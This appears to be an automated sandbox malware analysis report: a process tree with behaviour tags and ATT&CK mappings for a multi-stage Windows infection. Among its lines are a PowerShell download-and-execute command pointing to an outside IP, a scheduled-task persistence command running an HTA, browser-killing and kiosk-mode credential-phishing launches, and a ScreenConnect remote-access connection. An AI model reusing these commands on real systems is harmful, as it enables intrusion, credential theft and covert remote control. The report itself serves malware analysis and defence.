C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 9726⤵
- Program crash
PID:5936
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3948 -
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 8086⤵
- Program crash
PID:5136
-
-
-
C:\Users\Admin\AppData\Local\Temp\10009640101\a8e58ac38e.exe"C:\Users\Admin\AppData\Local\Temp\10009640101\a8e58ac38e.exe"5⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 11366⤵
- Program crash
PID:4480
-
-
-
C:\Users\Admin\AppData\Local\Temp\10009650101\cda781c13c.exe"C:\Users\Admin\AppData\Local\Temp\10009650101\cda781c13c.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5476 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4000
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089276001\e14cb127ab.exe"C:\Users\Admin\AppData\Local\Temp\1089276001\e14cb127ab.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
PID:4572
-
-
C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5728 -
C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5864 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2372 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd81b9cc40,0x7ffd81b9cc4c,0x7ffd81b9cc586⤵PID:4856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1976,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1972 /prefetch:26⤵PID:3628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1904,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2096 /prefetch:36⤵PID:5372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2292 /prefetch:86⤵PID:5416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:16⤵
- Uses browser remote debugging
PID:3504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3304 /prefetch:16⤵
- Uses browser remote debugging
PID:1620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4516,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:16⤵
- Uses browser remote debugging
PID:4480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3612 /prefetch:86⤵PID:6076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4384 /prefetch:86⤵PID:6008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4840 /prefetch:86⤵PID:5396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3612,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4472 /prefetch:86⤵PID:5472
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 9564⤵
- Program crash
PID:4836
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:4792
-
-
C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5428 -
C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 9684⤵
- Program crash
PID:5516
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5296 -
C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5296 -s 7884⤵
- Program crash
PID:708
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5672
-
-
C:\Users\Admin\AppData\Local\Temp\1089286001\64195aed60.exe"C:\Users\Admin\AppData\Local\Temp\1089286001\64195aed60.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5288
-
-
C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"4⤵
- Executes dropped EXE
PID:2984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 8004⤵
- Program crash
PID:5776
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\1089289001\cda781c13c.exe"C:\Users\Admin\AppData\Local\Temp\1089289001\cda781c13c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5236
-
-
C:\Users\Admin\AppData\Local\Temp\1089290001\74caf6e3ae.exe"C:\Users\Admin\AppData\Local\Temp\1089290001\74caf6e3ae.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5456
-
-
C:\Users\Admin\AppData\Local\Temp\1089291001\a18028f754.exe"C:\Users\Admin\AppData\Local\Temp\1089291001\a18028f754.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\1089292001\2d9223dc79.exe"C:\Users\Admin\AppData\Local\Temp\1089292001\2d9223dc79.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2452
-
-
C:\Users\Admin\AppData\Local\Temp\1089293001\ff653c0cca.exe"C:\Users\Admin\AppData\Local\Temp\1089293001\ff653c0cca.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\1089294001\80ceef0059.exe"C:\Users\Admin\AppData\Local\Temp\1089294001\80ceef0059.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\1089295001\e189d890b8.exe"C:\Users\Admin\AppData\Local\Temp\1089295001\e189d890b8.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4072 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- Kills process with taskkill
PID:3636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- Kills process with taskkill
PID:3316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2336
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6020 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {efea9a10-8391-4760-a1a4-a58cbca241c9} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" gpu6⤵PID:5104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a5f0882-f710-451d-bc6f-a080a43a73ab} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" socket6⤵PID:6120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2960 -childID 1 -isForBrowser -prefsHandle 1612 -prefMapHandle 1432 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b052712d-5e87-4163-a8f9-77d3ee7511b8} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab6⤵PID:5392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1188 -childID 2 -isForBrowser -prefsHandle 4076 -prefMapHandle 4088 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a3c56c5-de9e-4fc1-bc6b-1e71d0b5b651} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab6⤵PID:5720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1c96284-f84a-43b5-b351-ac99adabb6d0} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" utility6⤵
- Checks processor information in registry
PID:5812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4380 -childID 3 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c3cb250-18f6-47dd-9fe9-e0fff375d9b4} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab6⤵PID:4888
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 4 -isForBrowser -prefsHandle 5460 -prefMapHandle 5468 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84fbfb07-ad8a-4618-bd30-331f1dac7599} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab6⤵PID:5212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 5 -isForBrowser -prefsHandle 5736 -prefMapHandle 5732 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {416bb4fe-3fb9-477e-abe9-41bfdf764bbc} 6020 "\\.\pipe\gecko-crash-server-pipe.6020" tab6⤵PID:3476
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089296001\5846e91d4e.exe"C:\Users\Admin\AppData\Local\Temp\1089296001\5846e91d4e.exe"3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YotzzmaPqR9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\eM865lQIi.hta" /sc minute /mo 25 /ru "Admin" /f4⤵PID:5700
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YotzzmaPqR9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\eM865lQIi.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5008
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\eM865lQIi.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:872 -
C:\Users\Admin\AppData\Local\TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE"C:\Users\Admin\AppData\Local\TempIYO2CYHYQTUHDT2DSMYNBLVLLZQ2SRVJ.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5504
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2908 -ip 29081⤵PID:3868
-
C:\ProgramData\vbftwc\bxvt.exeC:\ProgramData\vbftwc\bxvt.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1460
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E12D4C35BBE75AF0AA88A001AEC0250A C2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID6D8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240637781 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5108
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:1580
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E305F73D09853E95DB883A58AFDA89902⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9B85C9FBD0E04272DFD8B5CB460F5052 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4748
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:224
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=5538fd77-72b6-457c-b3e9-8a5db180eeec&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3284 -
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "7444894e-b638-4068-b3bb-57a8094f6dea" "User"2⤵
- Executes dropped EXE
PID:1712
-
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "0ad4f51c-b9ea-40bd-bed1-d598ccc24a0a" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:1064
-
-
C:\ProgramData\apisysDirectx_11\apisysDirectx.exeC:\ProgramData\apisysDirectx_11\apisysDirectx.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5992
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6000
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:5148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5208 -ip 52081⤵PID:928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5728 -ip 57281⤵PID:5880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5884 -ip 58841⤵PID:2300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6104 -ip 61041⤵PID:1044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5428 -ip 54281⤵PID:776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5296 -ip 52961⤵PID:5760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1580 -ip 15801⤵PID:6132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3948 -ip 39481⤵PID:5952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4392 -ip 43921⤵PID:1468
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5524
-
C:\ProgramData\vbftwc\bxvt.exeC:\ProgramData\vbftwc\bxvt.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2232
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:708
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:3108
-
C:\ProgramData\apisysDirectx_11\apisysDirectx.exeC:\ProgramData\apisysDirectx_11\apisysDirectx.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4636 -ip 46361⤵PID:1208
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Component Object Model Hijacking
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
